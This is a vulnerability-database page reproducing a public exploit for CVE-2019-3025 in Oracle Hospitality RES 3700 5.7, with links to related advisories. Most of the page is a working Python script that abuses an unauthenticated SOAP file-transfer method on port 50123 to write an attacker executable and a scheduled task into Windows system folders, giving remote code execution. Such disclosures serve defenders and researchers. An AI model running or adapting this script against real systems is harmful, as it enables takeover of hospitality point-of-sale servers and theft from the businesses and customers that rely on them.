Lucene search

K

Oracle Hospitality RES 3700 5.7 Remote Code Execution

🗓️ 18 May 2020 00:00:00Reported by Walid FaourType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 159 Views

Oracle Hospitality RES 3700 5.7 Remote Code Execution by Walid Faou

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2019-3025
16 Oct 201918:15
nvd
Symantec
Oracle Hospitality RES 3700 CVE-2019-3025 Remote Security Vulnerability
15 Oct 201900:00
symantec
Exploit DB
Oracle Hospitality RES 3700 5.7 - Remote Code Execution
18 May 202000:00
exploitdb
Vulnrichment
CVE-2019-3025
16 Oct 201917:40
vulnrichment
CVE
CVE-2019-3025
16 Oct 201918:15
cve
0day.today
Oracle Hospitality RES 3700 5.7 - Remote Code Execution Exploit
19 May 202000:00
zdt
Prion
Buffer overflow
16 Oct 201918:15
prion
Cvelist
CVE-2019-3025
16 Oct 201917:40
cvelist
Oracle
Oracle Critical Patch Update Advisory - October 2019
22 Jan 202000:00
oracle
`# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution  
# Date: 2019-10-01  
# Exploit Author: Walid Faour  
# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/  
# Software Link: N/A (Available to customers)  
# Version: <= v5.7  
# Tested on: Windows Server 2003 / Windows Server 2008  
# CVE : CVE-2019-3025  
  
#!/usr/bin/env python  
  
#Author: Walid Faour  
#Date: Aug. 2, 2019  
#Oracle Hospitality RES 3700 Release 4.9 Exploit  
  
import binascii  
import requests  
  
print  
print '-------------------------------------------------'  
print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'  
print '-------------------------------------------------'  
print  
  
IP = raw_input("Enter the IP address: ")  
URL = "http://" + IP + ":50123"  
  
f = open("attacker-4.9.exe",'rb')  
raw_payload = f.read()  
payload_hex = binascii.hexlify(raw_payload)  
f.close()  
  
g = open("attacker-4.9.job",'rb')  
raw_task = g.read()  
scheduled_task_hex = binascii.hexlify(raw_task)  
g.close()  
  
def exploit_body(data,full_path):  
body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \  
<SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \  
<MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \  
<MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \  
<MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \  
<MCRS-ENV:InputParameters> \  
<dst>' + full_path + '</dst> \  
<fn>' + full_path + '</fn> \  
<data>' + data + '</data> \  
</MCRS-ENV:InputParameters> \  
</SOAP-ENV:Body> \  
</SOAP-ENV:Envelope>'  
return body  
def exploit_headers(body):  
headers = {  
"Content-Type" : "text/xml",  
"User-Agent" : "MDS POS Client",  
"Host" : IP + ":50123",  
"Content-Length" : str(len(body)),  
"Connection" : "Keep-Alive"  
}  
return headers  
print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'  
body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")  
body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")  
send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))  
send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo